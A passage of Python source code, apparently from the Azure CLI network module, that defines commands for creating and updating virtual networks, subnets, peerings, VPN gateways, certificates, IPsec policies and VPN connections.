instance.target = target
if target_resource_id is not None:
instance.target_resource_id = target_resource_id
if weight is not None:
instance.weight = weight
if min_child_endpoints is not None:
instance.min_child_endpoints = min_child_endpoints
if geo_mapping is not None:
instance.geo_mapping = geo_mapping
if subnets is not None:
instance.subnets = subnets
if monitor_custom_headers:
instance.custom_headers = monitor_custom_headers
return instance
def list_traffic_manager_endpoints(cmd, resource_group_name, profile_name, endpoint_type=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
profile = client.get(resource_group_name, profile_name)
return [e for e in profile.endpoints if not endpoint_type or e.type.endswith(endpoint_type)]
# endregion
# region VirtualNetworks
# pylint: disable=too-many-locals
def create_vnet(cmd, resource_group_name, vnet_name, vnet_prefixes='10.0.0.0/16',
subnet_name=None, subnet_prefix=None, dns_servers=None,
location=None, tags=None, vm_protection=None, ddos_protection=None, bgp_community=None,
ddos_protection_plan=None, network_security_group=None, edge_zone=None, flowtimeout=None):
AddressSpace, DhcpOptions, Subnet, VirtualNetwork, SubResource, NetworkSecurityGroup = \
cmd.get_models('AddressSpace', 'DhcpOptions', 'Subnet', 'VirtualNetwork',
'SubResource', 'NetworkSecurityGroup')
client = network_client_factory(cmd.cli_ctx).virtual_networks
tags = tags or {}
vnet = VirtualNetwork(
location=location, tags=tags,
dhcp_options=DhcpOptions(dns_servers=dns_servers),
address_space=AddressSpace(address_prefixes=(vnet_prefixes if isinstance(vnet_prefixes, list) else [vnet_prefixes]))) # pylint: disable=line-too-long
if subnet_name:
if cmd.supported_api_version(min_api='2018-08-01'):
vnet.subnets = [Subnet(name=subnet_name,
address_prefix=subnet_prefix[0] if len(subnet_prefix) == 1 else None,
address_prefixes=subnet_prefix if len(subnet_prefix) > 1 else None,
network_security_group=NetworkSecurityGroup(id=network_security_group)
if network_security_group else None)]
else:
vnet.subnets = [Subnet(name=subnet_name, address_prefix=subnet_prefix)]
if cmd.supported_api_version(min_api='2017-09-01'):
vnet.enable_ddos_protection = ddos_protection
vnet.enable_vm_protection = vm_protection
if cmd.supported_api_version(min_api='2018-02-01'):
vnet.ddos_protection_plan = SubResource(id=ddos_protection_plan) if ddos_protection_plan else None
if edge_zone:
vnet.extended_location = _edge_zone_model(cmd, edge_zone)
if flowtimeout is not None:
vnet.flow_timeout_in_minutes = flowtimeout
if bgp_community is not None and cmd.supported_api_version(min_api='2020-06-01'):
VirtualNetworkBgpCommunities = cmd.get_models('VirtualNetworkBgpCommunities')
vnet.bgp_communities = VirtualNetworkBgpCommunities(virtual_network_community=bgp_community)
return cached_put(cmd, client.begin_create_or_update, vnet, resource_group_name, vnet_name)
def update_vnet(cmd, instance, vnet_prefixes=None, dns_servers=None, ddos_protection=None, vm_protection=None,
ddos_protection_plan=None, flowtimeout=None, bgp_community=None):
# server side validation reports pretty good error message on invalid CIDR,
# so we don't validate at client side
AddressSpace, DhcpOptions, SubResource = cmd.get_models('AddressSpace', 'DhcpOptions', 'SubResource')
if vnet_prefixes and instance.address_space:
instance.address_space.address_prefixes = vnet_prefixes
elif vnet_prefixes:
instance.address_space = AddressSpace(address_prefixes=vnet_prefixes)
if dns_servers == ['']:
instance.dhcp_options.dns_servers = None
elif dns_servers and instance.dhcp_options:
instance.dhcp_options.dns_servers = dns_servers
elif dns_servers:
instance.dhcp_options = DhcpOptions(dns_servers=dns_servers)
if ddos_protection is not None:
instance.enable_ddos_protection = ddos_protection
if vm_protection is not None:
instance.enable_vm_protection = vm_protection
if ddos_protection_plan == '':
instance.ddos_protection_plan = None
elif ddos_protection_plan is not None:
instance.ddos_protection_plan = SubResource(id=ddos_protection_plan)
if flowtimeout is not None:
instance.flow_timeout_in_minutes = flowtimeout
if bgp_community is not None and cmd.supported_api_version(min_api='2020-06-01'):
VirtualNetworkBgpCommunities = cmd.get_models('VirtualNetworkBgpCommunities')
instance.bgp_communities = VirtualNetworkBgpCommunities(virtual_network_community=bgp_community)
return instance
def _set_route_table(ncf, resource_group_name, route_table, subnet):
if route_table:
is_id = is_valid_resource_id(route_table)
rt = None
if is_id:
res_id = parse_resource_id(route_table)
rt = ncf.route_tables.get(res_id['resource_group'], res_id['name'])
else:
rt = ncf.route_tables.get(resource_group_name, route_table)
subnet.route_table = rt
elif route_table == '':
subnet.route_table = None
def create_subnet(cmd, resource_group_name, virtual_network_name, subnet_name,
address_prefix, network_security_group=None,
route_table=None, service_endpoints=None, service_endpoint_policy=None,
delegations=None, nat_gateway=None,
disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, Subnet, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
if cmd.supported_api_version(min_api='2018-08-01'):
subnet = Subnet(
name=subnet_name,
address_prefixes=address_prefix if len(address_prefix) > 1 else None,
address_prefix=address_prefix[0] if len(address_prefix) == 1 else None
)
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
subnet.nat_gateway = SubResource(id=nat_gateway)
else:
subnet = Subnet(name=subnet_name, address_prefix=address_prefix)
if network_security_group:
subnet.network_security_group = NetworkSecurityGroup(id=network_security_group)
_set_route_table(ncf, resource_group_name, route_table, subnet)
if service_endpoints:
subnet.service_endpoints = []
for service in service_endpoints:
subnet.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy:
subnet.service_endpoint_policies = []
for policy in service_endpoint_policy:
subnet.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
subnet.delegations = delegations
if disable_private_endpoint_network_policies is True:
subnet.private_endpoint_network_policies = "Disabled"
if disable_private_endpoint_network_policies is False:
subnet.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies is True:
subnet.private_link_service_network_policies = "Disabled"
if disable_private_link_service_network_policies is False:
subnet.private_link_service_network_policies = "Enabled"
vnet = cached_get(cmd, ncf.virtual_networks.get, resource_group_name, virtual_network_name)
upsert_to_collection(vnet, 'subnets', subnet, 'name')
vnet = cached_put(
cmd, ncf.virtual_networks.begin_create_or_update, vnet, resource_group_name, virtual_network_name).result()
return get_property(vnet.subnets, subnet_name)
def update_subnet(cmd, instance, resource_group_name, address_prefix=None, network_security_group=None,
route_table=None, service_endpoints=None, delegations=None, nat_gateway=None,
service_endpoint_policy=None, disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'SubResource')
if address_prefix:
if cmd.supported_api_version(min_api='2018-08-01'):
instance.address_prefixes = address_prefix if len(address_prefix) > 1 else None
instance.address_prefix = address_prefix[0] if len(address_prefix) == 1 else None
else:
instance.address_prefix = address_prefix
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
instance.nat_gateway = SubResource(id=nat_gateway)
elif nat_gateway == '':
instance.nat_gateway = None
if network_security_group:
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
elif network_security_group == '': # clear it
instance.network_security_group = None
_set_route_table(network_client_factory(cmd.cli_ctx), resource_group_name, route_table, instance)
if service_endpoints == ['']:
instance.service_endpoints = None
elif service_endpoints:
instance.service_endpoints = []
for service in service_endpoints:
instance.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy == '':
instance.service_endpoint_policies = None
elif service_endpoint_policy:
instance.service_endpoint_policies = []
for policy in service_endpoint_policy:
instance.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
instance.delegations = delegations
if disable_private_endpoint_network_policies:
instance.private_endpoint_network_policies = "Disabled"
elif disable_private_endpoint_network_policies is not None:
instance.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies:
instance.private_link_service_network_policies = "Disabled"
elif disable_private_link_service_network_policies is not None:
instance.private_link_service_network_policies = "Enabled"
return instance
def list_avail_subnet_delegations(cmd, resource_group_name=None, location=None):
client = network_client_factory(cmd.cli_ctx)
if resource_group_name:
return client.available_resource_group_delegations.list(location, resource_group_name)
return client.available_delegations.list(location)
def create_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name,
remote_virtual_network, allow_virtual_network_access=False,
allow_forwarded_traffic=False, allow_gateway_transit=False,
use_remote_gateways=False):
if not is_valid_resource_id(remote_virtual_network):
remote_virtual_network = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=remote_virtual_network
)
SubResource, VirtualNetworkPeering = cmd.get_models('SubResource', 'VirtualNetworkPeering')
peering = VirtualNetworkPeering(
id=resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=virtual_network_name),
name=virtual_network_peering_name,
remote_virtual_network=SubResource(id=remote_virtual_network),
allow_virtual_network_access=allow_virtual_network_access,
allow_gateway_transit=allow_gateway_transit,
allow_forwarded_traffic=allow_forwarded_traffic,
use_remote_gateways=use_remote_gateways)
aux_subscription = parse_resource_id(remote_virtual_network)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def update_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name, **kwargs):
peering = kwargs['parameters']
aux_subscription = parse_resource_id(peering.remote_virtual_network.id)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def list_available_ips(cmd, resource_group_name, virtual_network_name):
client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet = client.get(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name)
start_ip = vnet.address_space.address_prefixes[0].split('/')[0]
available_ips = client.check_ip_address_availability(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
ip_address=start_ip)
return available_ips.available_ip_addresses
# endregion
# region VirtualNetworkGateways
def create_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, public_cert_data, cert_name):
VpnClientRootCertificate = cmd.get_models('VpnClientRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
raise CLIError("Must add address prefixes to gateway '{}' prior to adding a root cert."
.format(gateway_name))
config = gateway.vpn_client_configuration
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
cert = VpnClientRootCertificate(name=cert_name, public_cert_data=public_cert_data)
upsert_to_collection(config, 'vpn_client_root_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_root_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_root_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def create_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, thumbprint, cert_name):
VpnClientRevokedCertificate = cmd.get_models('VpnClientRevokedCertificate')
config, gateway, ncf = _prep_cert_create(cmd, gateway_name, resource_group_name)
cert = VpnClientRevokedCertificate(name=cert_name, thumbprint=thumbprint)
upsert_to_collection(config, 'vpn_client_revoked_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_revoked_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_revoked_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def _prep_cert_create(cmd, gateway_name, resource_group_name):
VpnClientConfiguration = cmd.get_models('VpnClientConfiguration')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
gateway.vpn_client_configuration = VpnClientConfiguration()
config = gateway.vpn_client_configuration
if not config.vpn_client_address_pool or not config.vpn_client_address_pool.address_prefixes:
raise CLIError('Address prefixes must be set on VPN gateways before adding'
' certificates. Please use "update" with --address-prefixes first.')
if config.vpn_client_revoked_certificates is None:
config.vpn_client_revoked_certificates = []
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
return config, gateway, ncf
def create_vnet_gateway(cmd, resource_group_name, virtual_network_gateway_name, public_ip_address,
virtual_network, location=None, tags=None,
no_wait=False, gateway_type=None, sku=None, vpn_type=None, vpn_gateway_generation=None,
asn=None, bgp_peering_address=None, peer_weight=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None, edge_zone=None,
nat_rule=None):
(VirtualNetworkGateway, BgpSettings, SubResource, VirtualNetworkGatewayIPConfiguration, VirtualNetworkGatewaySku,
VpnClientConfiguration, AddressSpace, VpnClientRootCertificate, VirtualNetworkGatewayNatRule,
VpnNatRuleMapping) = cmd.get_models(
'VirtualNetworkGateway', 'BgpSettings', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VirtualNetworkGatewaySku', 'VpnClientConfiguration', 'AddressSpace', 'VpnClientRootCertificate',
'VirtualNetworkGatewayNatRule', 'VpnNatRuleMapping')
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
subnet = virtual_network + '/subnets/GatewaySubnet'
active = len(public_ip_address) == 2
vnet_gateway = VirtualNetworkGateway(
gateway_type=gateway_type, vpn_type=vpn_type, vpn_gateway_generation=vpn_gateway_generation, location=location,
tags=tags, sku=VirtualNetworkGatewaySku(name=sku, tier=sku), active=active, ip_configurations=[],
gateway_default_site=SubResource(id=gateway_default_site) if gateway_default_site else None)
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic',
name='vnetGatewayConfig{}'.format(i)
)
vnet_gateway.ip_configurations.append(ip_configuration)
if asn or bgp_peering_address or peer_weight:
vnet_gateway.enable_bgp = True
vnet_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
if any((address_prefixes, client_protocol)):
vnet_gateway.vpn_client_configuration = VpnClientConfiguration()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
vnet_gateway.vpn_client_configuration.vpn_client_protocols = client_protocol
if any((radius_secret, radius_server)) and cmd.supported_api_version(min_api='2017-06-01'):
vnet_gateway.vpn_client_configuration.radius_server_address = radius_server
vnet_gateway.vpn_client_configuration.radius_server_secret = radius_secret
# multi authentication
if cmd.supported_api_version(min_api='2020-11-01'):
vnet_gateway.vpn_client_configuration.vpn_authentication_types = vpn_auth_type
vnet_gateway.vpn_client_configuration.aad_tenant = aad_tenant
vnet_gateway.vpn_client_configuration.aad_issuer = aad_issuer
vnet_gateway.vpn_client_configuration.aad_audience = aad_audience
vnet_gateway.vpn_client_configuration.vpn_client_root_certificates = [
VpnClientRootCertificate(name=root_cert_name,
public_cert_data=root_cert_data)] if root_cert_data else None
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
vnet_gateway.custom_routes = AddressSpace()
vnet_gateway.custom_routes.address_prefixes = custom_routes
if edge_zone:
vnet_gateway.extended_location = _edge_zone_model(cmd, edge_zone)
if nat_rule:
vnet_gateway.nat_rules = [
VirtualNetworkGatewayNatRule(type_properties_type=rule.get('type'), mode=rule.get('mode'), name=rule.get('name'),
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('internal_mappings')] if rule.get('internal_mappings') else None,
external_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('external_mappings')] if rule.get('external_mappings') else None,
ip_configuration_id=rule.get('ip_config_id')) for rule in nat_rule]
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, virtual_network_gateway_name, vnet_gateway)
def update_vnet_gateway(cmd, instance, sku=None, vpn_type=None, tags=None,
public_ip_address=None, gateway_type=None, enable_bgp=None,
asn=None, bgp_peering_address=None, peer_weight=None, virtual_network=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None):
(AddressSpace, SubResource, VirtualNetworkGatewayIPConfiguration, VpnClientConfiguration,
VpnClientRootCertificate) = cmd.get_models('AddressSpace', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VpnClientConfiguration', 'VpnClientRootCertificate')
if any((address_prefixes, radius_server, radius_secret, client_protocol)) and not instance.vpn_client_configuration:
instance.vpn_client_configuration = VpnClientConfiguration()
if address_prefixes is not None:
if not instance.vpn_client_configuration.vpn_client_address_pool:
instance.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
if not instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes:
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = []
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
with cmd.update_context(instance.vpn_client_configuration) as c:
c.set_param('vpn_client_protocols', client_protocol)
c.set_param('radius_server_address', radius_server)
c.set_param('radius_server_secret', radius_secret)
if cmd.supported_api_version(min_api='2020-11-01'):
c.set_param('aad_tenant', aad_tenant)
c.set_param('aad_audience', aad_audience)
c.set_param('aad_issuer', aad_issuer)
c.set_param('vpn_authentication_types', vpn_auth_type)
if root_cert_data and cmd.supported_api_version(min_api='2020-11-01'):
upsert_to_collection(instance.vpn_client_configuration, 'vpn_client_root_certificates',
VpnClientRootCertificate(name=root_cert_name, public_cert_data=root_cert_data), 'name')
with cmd.update_context(instance.sku) as c:
c.set_param('name', sku)
c.set_param('tier', sku)
with cmd.update_context(instance) as c:
c.set_param('gateway_default_site', SubResource(id=gateway_default_site) if gateway_default_site else None)
c.set_param('vpn_type', vpn_type)
c.set_param('tags', tags)
subnet_id = '{}/subnets/GatewaySubnet'.format(virtual_network) if virtual_network else \
instance.ip_configurations[0].subnet.id
if virtual_network is not None:
for config in instance.ip_configurations:
config.subnet.id = subnet_id
if public_ip_address is not None:
instance.ip_configurations = []
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet_id),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic', name='vnetGatewayConfig{}'.format(i))
instance.ip_configurations.append(ip_configuration)
# Update active-active/active-standby status
active = len(public_ip_address) == 2
if instance.active and not active:
logger.info('Placing gateway in active-standby mode.')
elif not instance.active and active:
logger.info('Placing gateway in active-active mode.')
instance.active = active
if gateway_type is not None:
instance.gateway_type = gateway_type
if enable_bgp is not None:
instance.enable_bgp = enable_bgp.lower() == 'true'
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
if not instance.custom_routes:
instance.custom_routes = AddressSpace()
instance.custom_routes.address_prefixes = custom_routes
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
return instance
def start_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def stop_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def generate_vpn_client(cmd, client, resource_group_name, virtual_network_gateway_name, processor_architecture=None,
authentication_method=None, radius_server_auth_certificate=None, client_root_certificates=None,
use_legacy=False):
params = cmd.get_models('VpnClientParameters')(
processor_architecture=processor_architecture
)
if cmd.supported_api_version(min_api='2017-06-01') and not use_legacy:
params.authentication_method = authentication_method
params.radius_server_auth_certificate = radius_server_auth_certificate
params.client_root_certificates = client_root_certificates
return client.begin_generate_vpn_profile(resource_group_name, virtual_network_gateway_name, params)
# legacy implementation
return client.begin_generatevpnclientpackage(resource_group_name, virtual_network_gateway_name, params)
def set_vpn_client_ipsec_policy(cmd, client, resource_group_name, virtual_network_gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
VpnClientIPsecParameters = cmd.get_models('VpnClientIPsecParameters')
vpnclient_ipsec_params = VpnClientIPsecParameters(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
return sdk_no_wait(no_wait, client.begin_set_vpnclient_ipsec_parameters, resource_group_name,
virtual_network_gateway_name, vpnclient_ipsec_params)
def disconnect_vnet_gateway_vpn_connections(cmd, client, resource_group_name, virtual_network_gateway_name,
vpn_connection_ids, no_wait=False):
P2SVpnConnectionRequest = cmd.get_models('P2SVpnConnectionRequest')
request = P2SVpnConnectionRequest(vpn_connection_ids=vpn_connection_ids)
return sdk_no_wait(no_wait, client.begin_disconnect_virtual_network_gateway_vpn_connections,
resource_group_name, virtual_network_gateway_name, request)
# endregion
# region VirtualNetworkGatewayConnections
# pylint: disable=too-many-locals
def create_vpn_connection(cmd, resource_group_name, connection_name, vnet_gateway1,
location=None, tags=None, no_wait=False, validate=False,
vnet_gateway2=None, express_route_circuit2=None, local_gateway2=None,
authorization_key=None, enable_bgp=False, routing_weight=10,
connection_type=None, shared_key=None,
use_policy_based_traffic_selectors=False,
express_route_gateway_bypass=None, ingress_nat_rule=None, egress_nat_rule=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import build_vpn_connection_resource
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
tags = tags or {}
# Build up the ARM template
master_template = ArmTemplateBuilder()
vpn_connection_resource = build_vpn_connection_resource(
cmd, connection_name, location, tags, vnet_gateway1,
vnet_gateway2 or local_gateway2 or express_route_circuit2,
connection_type, authorization_key, enable_bgp, routing_weight, shared_key,
use_policy_based_traffic_selectors, express_route_gateway_bypass, ingress_nat_rule, egress_nat_rule)
master_template.add_resource(vpn_connection_resource)
master_template.add_output('resource', connection_name, output_type='object')
if shared_key:
master_template.add_secure_parameter('sharedKey', shared_key)
if authorization_key:
master_template.add_secure_parameter('authorizationKey', authorization_key)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'vpn_connection_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def update_vpn_connection(cmd, instance, routing_weight=None, shared_key=None, tags=None,
enable_bgp=None, use_policy_based_traffic_selectors=None,
express_route_gateway_bypass=None):
with cmd.update_context(instance) as c:
c.set_param('routing_weight', routing_weight)
c.set_param('shared_key', shared_key)
c.set_param('tags', tags)
c.set_param('enable_bgp', enable_bgp)
c.set_param('express_route_gateway_bypass', express_route_gateway_bypass)
c.set_param('use_policy_based_traffic_selectors', use_policy_based_traffic_selectors)
# TODO: Remove these when issue #1615 is fixed
gateway1_id = parse_resource_id(instance.virtual_network_gateway1.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway1_id['subscription'])
instance.virtual_network_gateway1 = ncf.virtual_network_gateways.get(
gateway1_id['resource_group'], gateway1_id['name'])
if instance.virtual_network_gateway2:
gateway2_id = parse_resource_id(instance.virtual_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.virtual_network_gateway2 = ncf.virtual_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
if instance.local_network_gateway2:
gateway2_id = parse_resource_id(instance.local_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.local_network_gateway2 = ncf.local_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
return instance
def list_vpn_connections(cmd, resource_group_name, virtual_network_gateway_name=None):
if virtual_network_gateway_name:
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
return client.list_connections(resource_group_name, virtual_network_gateway_name)
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
return client.list(resource_group_name)
def start_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def stop_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def show_vpn_connection_device_config_script(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
vendor, device_family, firmware_version):
VpnDeviceScriptParameters = cmd.get_models('VpnDeviceScriptParameters')
parameters = VpnDeviceScriptParameters(
vendor=vendor,
device_family=device_family,
firmware_version=firmware_version
)
return client.vpn_device_configuration_script(resource_group_name, virtual_network_gateway_connection_name,
parameters=parameters)
# endregion
# region IPSec Policy Commands
def add_vnet_gateway_ipsec_policy(cmd, resource_group_name, gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
if gateway.vpn_client_configuration.vpn_client_ipsec_policies:
gateway.vpn_client_configuration.vpn_client_ipsec_policies.append(new_policy)
else:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = [new_policy]
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def clear_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = None
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
return LongRunningOperation(cmd.cli_ctx)(poller).vpn_client_configuration.vpn_client_ipsec_policies
def list_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
try:
return ncf.get(resource_group_name, gateway_name).vpn_client_configuration.vpn_client_ipsec_policies
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
def add_vpn_conn_ipsec_policy(cmd, client, resource_group_name, connection_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
